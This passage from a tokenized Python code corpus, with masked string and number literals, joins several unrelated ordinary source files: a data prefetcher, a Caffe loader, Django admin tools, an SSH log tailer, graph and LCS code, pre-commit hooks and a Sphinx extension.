nr_prefetch = nr_prefetch <EOL> self . queue = multiprocessing . Queue ( self . nr_prefetch ) <EOL> self . procs = [ PrefetchProcess ( self . ds , self . queue ) <EOL> for _ in range ( self . nr_proc ) ] <EOL> ensure_proc_terminate ( self . procs ) <EOL> for x in self . procs : <EOL> x . start ( ) <EOL> def get_data ( self ) : <EOL> for _ in range ( self . _size ) : <EOL> dp = self . queue . get ( ) <EOL> yield dp <EOL> def __del__ ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> self . queue . close ( ) <EOL> for x in self . procs : <EOL> x . terminate ( ) <EOL> logger . info ( "<STR_LIT>" ) </s>
<s> from collections import namedtuple , defaultdict <EOL> from abc import abstractmethod <EOL> import numpy as np <EOL> import copy <EOL> import os <EOL> from six . moves import zip <EOL> from . utils import change_env <EOL> from . import logger <EOL> def get_processor ( ) : <EOL> ret = { } <EOL> def process_conv ( layer_name , param , input_data_shape ) : <EOL> assert len ( param ) == <NUM_LIT:2> <EOL> return { layer_name + '<STR_LIT>' : param [ <NUM_LIT:0> ] . data . transpose ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:0> ) , <EOL> layer_name + '<STR_LIT>' : param [ <NUM_LIT:1> ] . data } <EOL> ret [ '<STR_LIT>' ] = process_conv <EOL> def process_fc ( layer_name , param , input_data_shape ) : <EOL> assert len ( param ) == <NUM_LIT:2> <EOL> if len ( input_data_shape ) == <NUM_LIT:3> : <EOL> logger . info ( "<STR_LIT>" . format ( layer_name ) ) <EOL> W = param [ <NUM_LIT:0> ] . data <EOL> W = W . reshape ( ( - <NUM_LIT:1> , ) + input_data_shape ) . transpose ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> else : <EOL> W = param [ <NUM_LIT:0> ] . data . transpose ( ) <EOL> return { layer_name + '<STR_LIT>' : W , <EOL> layer_name + '<STR_LIT>' : param [ <NUM_LIT:1> ] . data } <EOL> ret [ '<STR_LIT>' ] = process_fc <EOL> return ret <EOL> def load_caffe ( model_desc , model_file ) : <EOL> """<STR_LIT>""" <EOL> param_dict = { } <EOL> param_processors = get_processor ( ) <EOL> with change_env ( '<STR_LIT>' , '<STR_LIT:2>' ) : <EOL> import caffe <EOL> caffe . set_mode_cpu ( ) <EOL> net = caffe . Net ( model_desc , model_file , caffe . TEST ) <EOL> layer_names = net . _layer_names <EOL> blob_names = net . blobs . keys ( ) <EOL> for layername , layer in zip ( layer_names , net . layers ) : <EOL> try : <EOL> prev_blob_name = blob_names [ blob_names . index ( layername ) - <NUM_LIT:1> ] <EOL> prev_data_shape = net . blobs [ prev_blob_name ] . data . shape [ <NUM_LIT:1> : ] <EOL> except ValueError : <EOL> prev_data_shape = None <EOL> if layer . type in param_processors : <EOL> param_dict . update ( param_processors [ layer . type ] ( <EOL> layername , layer . blobs , prev_data_shape ) ) <EOL> else : <EOL> assert len ( layer . blobs ) == <NUM_LIT:0> , len ( layer . blobs ) <EOL> logger . info ( "<STR_LIT>" + "<STR_LIT:U+0020>" . join ( sorted ( param_dict . keys ( ) ) ) ) <EOL> return param_dict <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import argparse <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> ret = load_caffe ( args . model , args . weights ) <EOL> import numpy as np <EOL> np . save ( args . output , ret ) </s>
<s> import mimetypes <EOL> from django import template <EOL> from django . conf import settings <EOL> from django . contrib import messages <EOL> from django . contrib . admin import helpers <EOL> from django . http import HttpResponse <EOL> from django . shortcuts import render_to_response <EOL> from django . utils . translation import ugettext as _ <EOL> import object_tools <EOL> from export import forms , tasks , utils <EOL> class Export ( object_tools . ObjectTool ) : <EOL> name = '<STR_LIT>' <EOL> label = '<STR_LIT>' <EOL> help_text = '<STR_LIT>' <EOL> form_class = forms . Export <EOL> def serialize ( self , format , queryset , fields = [ ] ) : <EOL> return utils . serialize ( format , queryset , fields ) <EOL> def gen_filename ( self , format ) : <EOL> app_label = self . model . _meta . app_label <EOL> object_name = self . model . _meta . object_name . lower ( ) <EOL> if format == '<STR_LIT>' : <EOL> format = '<STR_LIT>' <EOL> return '<STR_LIT>' % ( self . name , app_label , object_name , format ) <EOL> def order ( self , queryset , by , direction ) : <EOL> return utils . order_queryset ( queryset , by , direction ) <EOL> def has_celery ( self ) : <EOL> return '<STR_LIT>' in getattr ( settings , '<STR_LIT>' , [ ] ) <EOL> def get_queryset ( self , form ) : <EOL> return utils . get_queryset ( form , self . model ) <EOL> def get_data ( self , form ) : <EOL> queryset = self . get_queryset ( form ) <EOL> format = form . cleaned_data [ '<STR_LIT>' ] <EOL> fields = form . cleaned_data [ '<STR_LIT>' ] <EOL> data = self . serialize ( format , queryset , fields ) <EOL> return format , data <EOL> def export_response ( self , form ) : <EOL> format , data = self . get_data ( form ) <EOL> filename = self . gen_filename ( format ) <EOL> response = HttpResponse ( <EOL> data , content_type = mimetypes . guess_type ( filename ) [ <NUM_LIT:0> ] <EOL> ) <EOL> response [ '<STR_LIT>' ] = '<STR_LIT>' % filename <EOL> return response <EOL> def mail_response ( self , request , extra_context = None ) : <EOL> form = extra_context [ '<STR_LIT>' ] <EOL> format = form . cleaned_data [ '<STR_LIT>' ] <EOL> filename = self . gen_filename ( format ) <EOL> serializer_kwargs = { <EOL> '<STR_LIT>' : form . cleaned_data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : format <EOL> } <EOL> query_kwargs = { <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT>' : self . model <EOL> } <EOL> if self . has_celery ( ) : <EOL> return tasks . mail_export . delay ( <EOL> request . user . email , filename , serializer_kwargs , query_kwargs <EOL> ) <EOL> return utils . mail_export ( <EOL> request . user . email , filename , serializer_kwargs , query_kwargs <EOL> ) <EOL> def view ( self , request , extra_context = None , process_form = True ) : <EOL> form = extra_context [ '<STR_LIT>' ] <EOL> if form . is_valid ( ) and process_form : <EOL> if '<STR_LIT>' in request . POST : <EOL> message = _ ( '<STR_LIT>' % ( request . user . email ) ) <EOL> messages . add_message ( request , messages . SUCCESS , message ) <EOL> self . mail_response ( request , extra_context ) <EOL> else : <EOL> return self . export_response ( form ) <EOL> adminform = helpers . AdminForm ( form , form . fieldsets , { } ) <EOL> context = { '<STR_LIT>' : adminform } <EOL> context . update ( extra_context or { } ) <EOL> context_instance = template . RequestContext ( request ) <EOL> return render_to_response ( <EOL> '<STR_LIT>' , <EOL> context , <EOL> context_instance = context_instance <EOL> ) <EOL> object_tools . tools . register ( Export ) </s>
<s> """<STR_LIT>""" <EOL> from django . contrib import admin <EOL> from django . contrib . contenttypes import generic <EOL> from models import * <EOL> class GalleryAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> list_filter = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> date_hierarchy = '<STR_LIT>' <EOL> prepopulated_fields = { '<STR_LIT>' : ( '<STR_LIT:title>' , ) } <EOL> filter_horizontal = ( '<STR_LIT>' , ) <EOL> class PhotoAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> list_filter = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> search_fields = [ '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> list_per_page = <NUM_LIT:10> <EOL> prepopulated_fields = { '<STR_LIT>' : ( '<STR_LIT:title>' , ) } <EOL> class PhotoEffectAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT:name>' , '<STR_LIT:description>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> fieldsets = ( <EOL> ( None , { <EOL> '<STR_LIT>' : ( '<STR_LIT:name>' , '<STR_LIT:description>' ) <EOL> } ) , <EOL> ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> } ) , <EOL> ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) <EOL> } ) , <EOL> ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> } ) , <EOL> ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) <EOL> } ) , <EOL> ) <EOL> class PhotoSizeAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT:name>' , '<STR_LIT:width>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> fieldsets = ( <EOL> ( None , { <EOL> '<STR_LIT>' : ( '<STR_LIT:name>' , '<STR_LIT:width>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> } ) , <EOL> ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> } ) , <EOL> ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , ) <EOL> } ) , <EOL> ) <EOL> class WatermarkAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class GalleryUploadAdmin ( admin . ModelAdmin ) : <EOL> def has_change_permission ( self , request , obj = None ) : <EOL> return False <EOL> class ImageOverrideInline ( generic . GenericTabularInline ) : <EOL> model = ImageOverride <EOL> admin . site . register ( Gallery , GalleryAdmin ) <EOL> admin . site . register ( GalleryUpload , GalleryUploadAdmin ) <EOL> admin . site . register ( Photo , PhotoAdmin ) <EOL> admin . site . register ( PhotoEffect , PhotoEffectAdmin ) <EOL> admin . site . register ( PhotoSize , PhotoSizeAdmin ) <EOL> admin . site . register ( Watermark , WatermarkAdmin ) </s>
<s> import os <EOL> import time <EOL> import paramiko <EOL> class SSHTailer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , remote_filename , private_key = None , verbose = False ) : <EOL> if '<STR_LIT:@>' in host : <EOL> self . username , self . host = tuple ( host . split ( '<STR_LIT:@>' ) ) <EOL> else : <EOL> self . username , self . host = None , host <EOL> self . remote_filename = remote_filename <EOL> self . private_key = private_key <EOL> self . client = None <EOL> self . sftp_client = None <EOL> self . remote_file_size = None <EOL> self . line_terminators = [ '<STR_LIT:\r>' , '<STR_LIT:\n>' , '<STR_LIT:\r\n>' ] <EOL> self . line_terminators_joined = '<STR_LIT:\r\n>' <EOL> self . verbose = verbose <EOL> def connect ( self ) : <EOL> if self . verbose : <EOL> print "<STR_LIT>" % self . host <EOL> self . client = paramiko . SSHClient ( ) <EOL> self . client . load_system_host_keys ( ) <EOL> self . client . set_missing_host_key_policy ( paramiko . AutoAddPolicy ( ) ) <EOL> if self . private_key : <EOL> self . client . connect ( self . host , username = self . username , pkey = self . private_key ) <EOL> else : <EOL> self . client . connect ( self . host , username = self . username ) <EOL> if self . verbose : <EOL> print "<STR_LIT>" % self . remote_filename <EOL> self . sftp_client = self . client . open_sftp ( ) <EOL> def tail ( self ) : <EOL> if not self . sftp_client : <EOL> self . connect ( ) <EOL> fstat = self . sftp_client . stat ( self . remote_filename ) <EOL> if self . remote_file_size is not None : <EOL> if self . remote_file_size < fstat . st_size : <EOL> for line in self . get_new_lines ( ) : <EOL> yield line <EOL> self . remote_file_size = fstat . st_size <EOL> def get_new_lines ( self ) : <EOL> """<STR_LIT>""" <EOL> remote_file = self . sftp_client . open ( self . remote_filename , '<STR_LIT:r>' ) <EOL> remote_file . seek ( self . remote_file_size , <NUM_LIT:0> ) <EOL> line = remote_file . readline ( ) <EOL> while line : <EOL> yield line . strip ( self . line_terminators_joined ) <EOL> line = remote_file . readline ( ) <EOL> remote_file . close ( ) <EOL> def disconnect ( self ) : <EOL> if self . sftp_client : <EOL> if self . verbose : <EOL> print "<STR_LIT>" <EOL> self . sftp_client . close ( ) <EOL> self . sftp_client = None <EOL> if self . client : <EOL> if self . verbose : <EOL> print "<STR_LIT>" <EOL> self . client . close ( ) <EOL> self . client = None <EOL> class SSHMultiTailer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host_files , poll_interval = <NUM_LIT> , private_key = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> self . host_files = host_files <EOL> self . poll_interval = poll_interval <EOL> self . private_key = private_key <EOL> self . tailers = { } <EOL> self . verbose = verbose <EOL> def connect ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . verbose : <EOL> print "<STR_LIT>" <EOL> for host , files in self . host_files . iteritems ( ) : <EOL> self . tailers [ host ] = { } <EOL> for f in files : <EOL> self . tailers [ host ] [ f ] = SSHTailer ( host , f , private_key = self . private_key , verbose = self . verbose ) <EOL> def tail ( self , report_sleep = False ) : <EOL> """<STR_LIT>""" <EOL> if not self . tailers : <EOL> self . connect ( ) <EOL> try : <EOL> while <NUM_LIT:1> : <EOL> lines_read = <NUM_LIT:0> <EOL> for host , tailers in self . tailers . iteritems ( ) : <EOL> for filename , tailer in tailers . iteritems ( ) : <EOL> for line in tailer . tail ( ) : <EOL> yield host , filename , line <EOL> lines_read += <NUM_LIT:1> <EOL> if not lines_read : <EOL> if report_sleep : <EOL> yield None , None , None <EOL> self . sleep ( ) <EOL> finally : <EOL> self . disconnect ( ) <EOL> def sleep ( self ) : <EOL> time . sleep ( self . poll_interval ) <EOL> def disconnect ( self ) : <EOL> """<STR_LIT>""" <EOL> for host , tailers in self . tailers . iteritems ( ) : <EOL> for filename , tailer in tailers . iteritems ( ) : <EOL> tailer . disconnect ( ) <EOL> self . tailers = { } <EOL> if self . verbose : <EOL> print "<STR_LIT>" </s>
<s> def get_a_tour ( ) : <EOL> '''<STR_LIT>''' <EOL> global graph <EOL> nodes_degree = { } <EOL> for edge in graph : <EOL> a , b = edge [ <NUM_LIT:0> ] , edge [ <NUM_LIT:1> ] <EOL> nodes_degree [ a ] = nodes_degree . get ( a , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> nodes_degree [ b ] = nodes_degree . get ( b , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> tour = [ ] <EOL> loop = enumerate ( nodes_degree ) <EOL> while True : <EOL> try : <EOL> l = loop . __next__ ( ) <EOL> index = l [ <NUM_LIT:0> ] <EOL> node = l [ <NUM_LIT:1> ] <EOL> degree = nodes_degree [ node ] <EOL> try : <EOL> if ( tour [ - <NUM_LIT:1> ] , node ) in graph or ( node , tour [ - <NUM_LIT:1> ] ) in graph : <EOL> tour . append ( node ) <EOL> try : <EOL> graph . remove ( ( tour [ - <NUM_LIT:2> ] , tour [ - <NUM_LIT:1> ] ) ) <EOL> nodes_degree [ tour [ - <NUM_LIT:1> ] ] -= <NUM_LIT:1> <EOL> nodes_degree [ tour [ - <NUM_LIT:2> ] ] -= <NUM_LIT:1> <EOL> except ValueError : <EOL> graph . remove ( ( tour [ - <NUM_LIT:1> ] , tour [ - <NUM_LIT:2> ] ) ) <EOL> nodes_degree [ tour [ - <NUM_LIT:1> ] ] -= <NUM_LIT:1> <EOL> nodes_degree [ tour [ - <NUM_LIT:2> ] ] -= <NUM_LIT:1> <EOL> except IndexError : <EOL> tour . append ( node ) <EOL> except StopIteration : <EOL> loop = enumerate ( nodes_degree ) <EOL> if len ( tour ) > <NUM_LIT:2> : <EOL> if tour [ <NUM_LIT:0> ] == tour [ - <NUM_LIT:1> ] : <EOL> return tour <EOL> def get_eulerian_tour ( ) : <EOL> '''<STR_LIT>''' <EOL> global graph <EOL> tour = get_a_tour ( ) <EOL> if graph : <EOL> loop = enumerate ( tour [ : - <NUM_LIT:1> ] ) <EOL> l = loop . __next__ ( ) <EOL> i = l [ <NUM_LIT:0> ] <EOL> node = l [ <NUM_LIT:1> ] <EOL> try : <EOL> while True : <EOL> if node in list ( zip ( * graph ) ) [ <NUM_LIT:0> ] or node in list ( zip ( * graph ) ) [ <NUM_LIT:1> ] : <EOL> t = get_a_tour ( ) <EOL> j = t . index ( node ) <EOL> tour = tour [ : i ] + t [ j : - <NUM_LIT:1> ] + t [ : j + <NUM_LIT:1> ] + tour [ i + <NUM_LIT:1> : ] <EOL> if not graph : <EOL> return tour <EOL> loop = enumerate ( tour [ : - <NUM_LIT:1> ] ) <EOL> l = loop . __next__ ( ) <EOL> i = l [ <NUM_LIT:0> ] <EOL> node = l [ <NUM_LIT:1> ] <EOL> except StopIteration : <EOL> print ( "<STR_LIT>" ) <EOL> exit ( ) <EOL> else : <EOL> return tour <EOL> nodes_degree = { } <EOL> for edge in graph : <EOL> a , b = edge [ <NUM_LIT:0> ] , edge [ <NUM_LIT:1> ] <EOL> nodes_degree [ a ] = nodes_degree . get ( a , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> nodes_degree [ b ] = nodes_degree . get ( b , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> degrees = nodes_degree . values ( ) <EOL> for degree in degrees : <EOL> if degree % <NUM_LIT:2> : <EOL> print ( "<STR_LIT>" ) <EOL> exit ( ) <EOL> tour = get_eulerian_tour ( ) <EOL> print ( tour ) </s>
<s> import unittest <EOL> import lcs <EOL> class TestLCS ( unittest . TestCase ) : <EOL> def test_lcs ( self ) : <EOL> self . assertEqual ( lcs . longest_common_subsequence ( "<STR_LIT>" , "<STR_LIT>" ) , ( <NUM_LIT:4> , "<STR_LIT>" ) ) <EOL> self . assertEqual ( lcs . longest_common_subsequence ( "<STR_LIT>" , "<STR_LIT>" ) , ( <NUM_LIT:4> , "<STR_LIT>" ) ) <EOL> self . assertEqual ( lcs . longest_common_subsequence ( "<STR_LIT>" , "<STR_LIT>" ) , ( <NUM_LIT:3> , "<STR_LIT>" ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> AUTHORIZATION_FAILED = <NUM_LIT:5> <EOL> PERMISSION_IS_DENIED = <NUM_LIT:7> <EOL> CAPTCHA_IS_NEEDED = <NUM_LIT> <EOL> ACCESS_DENIED = <NUM_LIT:15> <EOL> USER_IS_DELETED_OR_BANNED = <NUM_LIT> <EOL> INVALID_USER_ID = <NUM_LIT> <EOL> class VkException ( Exception ) : <EOL> pass <EOL> class VkAuthError ( VkException ) : <EOL> pass <EOL> class VkParseError ( VkAuthError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class VkPageWarningsError ( VkParseError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class VkAPIError ( VkException ) : <EOL> __slots__ = [ '<STR_LIT:error>' , '<STR_LIT:code>' , '<STR_LIT:message>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , vk_error_data ) : <EOL> super ( VkAPIError , self ) . __init__ ( ) <EOL> self . error_data = vk_error_data <EOL> self . code = vk_error_data . get ( '<STR_LIT>' ) <EOL> self . message = vk_error_data . get ( '<STR_LIT>' ) <EOL> self . request_params = self . get_pretty_request_params ( vk_error_data ) <EOL> self . redirect_uri = vk_error_data . get ( '<STR_LIT>' ) <EOL> @ staticmethod <EOL> def get_pretty_request_params ( error_data ) : <EOL> request_params = error_data . get ( '<STR_LIT>' , ( ) ) <EOL> request_params = { param [ '<STR_LIT:key>' ] : param [ '<STR_LIT:value>' ] <EOL> for param in request_params } <EOL> return request_params <EOL> def is_access_token_incorrect ( self ) : <EOL> return all ( [ self . code == ACCESS_DENIED , <EOL> '<STR_LIT>' in self . message ] ) <EOL> def is_captcha_needed ( self ) : <EOL> return self . code == CAPTCHA_IS_NEEDED <EOL> def is_user_deleted_or_banned ( self ) : <EOL> return self . code == USER_IS_DELETED_OR_BANNED <EOL> @ property <EOL> def captcha_sid ( self ) : <EOL> return self . error_data . get ( '<STR_LIT>' ) <EOL> @ property <EOL> def captcha_img ( self ) : <EOL> return self . error_data . get ( '<STR_LIT>' ) <EOL> def __str__ ( self ) : <EOL> tokens = [ '<STR_LIT>' % self . code , <EOL> '<STR_LIT>' % self . message , <EOL> '<STR_LIT>' % self . request_params ] <EOL> if self . redirect_uri : <EOL> tokens . append ( '<STR_LIT>' % self . redirect_uri ) <EOL> return '<STR_LIT:U+002C>' . join ( tokens ) </s>
<s> from __future__ import print_function <EOL> import argparse <EOL> import fileinput <EOL> import os <EOL> import sys <EOL> from pre_commit_hooks . util import cmd_output <EOL> def _fix_file ( filename , markdown = False ) : <EOL> for line in fileinput . input ( [ filename ] , inplace = True ) : <EOL> if markdown and ( not line . isspace ( ) ) and ( line . endswith ( "<STR_LIT>" ) ) : <EOL> line = line . rstrip ( '<STR_LIT>' ) <EOL> if not line [ - <NUM_LIT:1> ] . isspace ( ) : <EOL> print ( line + "<STR_LIT:U+0020>" ) <EOL> continue <EOL> print ( line . rstrip ( ) ) <EOL> def fix_trailing_whitespace ( argv = None ) : <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> const = [ ] , <EOL> default = argparse . SUPPRESS , <EOL> dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> const = '<STR_LIT>' , <EOL> default = [ '<STR_LIT>' ] , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:?>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> parser . add_argument ( '<STR_LIT>' , nargs = '<STR_LIT:*>' , help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( argv ) <EOL> bad_whitespace_files = cmd_output ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , * args . filenames , retcode = None <EOL> ) . strip ( ) . splitlines ( ) <EOL> md_args = args . markdown_linebreak_ext <EOL> if '<STR_LIT>' in md_args : <EOL> parser . error ( '<STR_LIT>' ) <EOL> all_markdown = '<STR_LIT:*>' in md_args <EOL> md_exts = [ '<STR_LIT:.>' + x . lower ( ) . lstrip ( '<STR_LIT:.>' ) <EOL> for x in '<STR_LIT:U+002C>' . join ( md_args ) . split ( '<STR_LIT:U+002C>' ) ] <EOL> for ext in md_exts : <EOL> if any ( c in ext [ <NUM_LIT:1> : ] for c in r'<STR_LIT>' ) : <EOL> parser . error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( ext ) <EOL> ) <EOL> if bad_whitespace_files : <EOL> for bad_whitespace_file in bad_whitespace_files : <EOL> print ( '<STR_LIT>' . format ( bad_whitespace_file ) ) <EOL> _ , extension = os . path . splitext ( bad_whitespace_file . lower ( ) ) <EOL> _fix_file ( bad_whitespace_file , all_markdown or extension in md_exts ) <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( fix_trailing_whitespace ( ) ) </s>
<s> from __future__ import absolute_import <EOL> from __future__ import unicode_literals <EOL> import pytest <EOL> from pre_commit_hooks . util import CalledProcessError <EOL> from pre_commit_hooks . util import cmd_output <EOL> def test_raises_on_error ( ) : <EOL> with pytest . raises ( CalledProcessError ) : <EOL> cmd_output ( '<STR_LIT>' , '<STR_LIT:-c>' , '<STR_LIT>' ) <EOL> def test_output ( ) : <EOL> ret = cmd_output ( '<STR_LIT>' , '<STR_LIT:-c>' , '<STR_LIT>' ) <EOL> assert ret == '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> import os . path <EOL> from cached_property import cached_property <EOL> import pre_commit . constants as C <EOL> from pre_commit . clientlib . validate_manifest import load_manifest <EOL> class Manifest ( object ) : <EOL> def __init__ ( self , repo_path_getter ) : <EOL> self . repo_path_getter = repo_path_getter <EOL> @ cached_property <EOL> def manifest_contents ( self ) : <EOL> manifest_path = os . path . join ( <EOL> self . repo_path_getter . repo_path , C . MANIFEST_FILE , <EOL> ) <EOL> return load_manifest ( manifest_path ) <EOL> @ cached_property <EOL> def hooks ( self ) : <EOL> return dict ( ( hook [ '<STR_LIT:id>' ] , hook ) for hook in self . manifest_contents ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import six <EOL> from docutils import nodes <EOL> from docutils . parsers . rst import directives <EOL> from docutils . statemachine import ViewList <EOL> from sphinx . util import force_decode <EOL> from sphinx . util . compat import Directive <EOL> from sphinx . util . nodes import nested_parse_with_titles <EOL> from sphinx . util . docstrings import prepare_docstring <EOL> from sphinx . pycode import ModuleAnalyzer <EOL> from sphinxcontrib import httpdomain <EOL> from sphinxcontrib . autohttp . common import http_directive , import_object <EOL> def translate_bottle_rule ( app , rule ) : <EOL> buf = six . StringIO ( ) <EOL> if hasattr ( app . router , "<STR_LIT>" ) : <EOL> iterator = app . router . parse_rule ( rule ) <EOL> else : <EOL> iterator = app . router . _itertokens ( rule ) <EOL> for name , filter , conf in iterator : <EOL> if filter : <EOL> buf . write ( '<STR_LIT:(>' ) <EOL> buf . write ( name ) <EOL> if ( filter != app . router . default_filter and filter != '<STR_LIT:default>' ) or conf : <EOL> buf . write ( '<STR_LIT::>' ) <EOL> buf . write ( filter ) <EOL> if conf : <EOL> buf . write ( '<STR_LIT::>' ) <EOL> buf . write ( conf ) <EOL> buf . write ( '<STR_LIT:)>' ) <EOL> else : <EOL> buf . write ( name ) <EOL> return buf . getvalue ( ) <EOL> def get_routes ( app ) : <EOL> for route in app . routes : <EOL> path = translate_bottle_rule ( app , route . rule ) <EOL> yield route . method , path , route <EOL> class AutobottleDirective ( Directive ) : <EOL> has_content = True <EOL> required_arguments = <NUM_LIT:1> <EOL> option_spec = { '<STR_LIT>' : directives . unchanged , <EOL> '<STR_LIT>' : directives . unchanged , <EOL> '<STR_LIT>' : directives . unchanged } <EOL> @ property <EOL> def endpoints ( self ) : <EOL> endpoints = self . options . get ( '<STR_LIT>' , None ) <EOL> if not endpoints : <EOL> return None <EOL> return frozenset ( re . split ( r'<STR_LIT>' , endpoints ) ) <EOL> @ property <EOL> def undoc_endpoints ( self ) : <EOL> undoc_endpoints = self . options . get ( '<STR_LIT>' , None ) <EOL> if not undoc_endpoints : <EOL> return frozenset ( ) <EOL> return frozenset ( re . split ( r'<STR_LIT>' , undoc_endpoints ) ) <EOL> def make_rst ( self ) : <EOL> app = import_object ( self . arguments [ <NUM_LIT:0> ] ) <EOL> for method , path , target in get_routes ( app ) : <EOL> endpoint = target . name or target . callback . __name__ <EOL> if self . endpoints and endpoint not in self . endpoints : <EOL> continue <EOL> if endpoint in self . undoc_endpoints : <EOL> continue <EOL> view = target . callback <EOL> docstring = view . __doc__ or '<STR_LIT>' <EOL> if not isinstance ( docstring , six . text_type ) : <EOL> analyzer = ModuleAnalyzer . for_module ( view . __module__ ) <EOL> docstring = force_decode ( docstring , analyzer . encoding ) <EOL> if not docstring and '<STR_LIT>' not in self . options : <EOL> continue <EOL> docstring = prepare_docstring ( docstring ) <EOL> for line in http_directive ( method , path , docstring ) : <EOL> yield line <EOL> def run ( self ) : <EOL> node = nodes . section ( ) <EOL> node . document = self . state . document <EOL> result = ViewList ( ) <EOL> for line in self . make_rst ( ) : <EOL> result . append ( line , '<STR_LIT>' ) <EOL> nested_parse_with_titles ( self . state , result , node ) <EOL> return node . children <EOL> def setup ( app ) : <EOL> if '<STR_LIT:http>' not in app . domains : <EOL> httpdomain . setup ( app ) <EOL> app . add_directive ( '<STR_LIT>' , AutobottleDirective ) </s>
<s> import os <EOL> import re <EOL> import pip <EOL> import sys <EOL> import urllib <EOL> from distutils . dir_util import remove_tree <EOL> from distutils import log as logger <EOL> try : <EOL> from setuptools import Command <EOL> except ImportError : <EOL> from distutils . core import Command <EOL> from packaging import package_dir <EOL> class bdist_prestoadmin ( Command ) : <EOL> description = '<STR_LIT>' <EOL> user_options = [ ( '<STR_LIT>' , '<STR_LIT:b>' , <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:d>' , <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:k>' , <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> ] <EOL> default_virtualenv_version = '<STR_LIT>' <EOL> def build_wheel ( self , build_dir ) : <EOL> cmd = self . reinitialize_command ( '<STR_LIT>' ) <EOL> cmd . dist_dir = build_dir <EOL> self . run_command ( '<STR_LIT>' ) <EOL> cmd . finalize_options ( ) <EOL> wheel_name = cmd . get_archive_basename ( ) <EOL> logger . info ( '<STR_LIT>' , wheel_name + '<STR_LIT>' , build_dir ) <EOL> return wheel_name <EOL> def generate_install_script ( self , wheel_name , build_dir ) : <EOL> template = open ( os . path . join ( package_dir , <EOL> '<STR_LIT>' ) , '<STR_LIT:r>' ) <EOL> install_script = open ( os . path . join ( build_dir , <EOL> '<STR_LIT>' ) , '<STR_LIT:w>' ) <EOL> if self . online_install : <EOL> extra_install_args = '<STR_LIT>' <EOL> else : <EOL> extra_install_args = '<STR_LIT>' <EOL> for line in template . readlines ( ) : <EOL> line = re . sub ( r'<STR_LIT>' , <EOL> extra_install_args , line ) 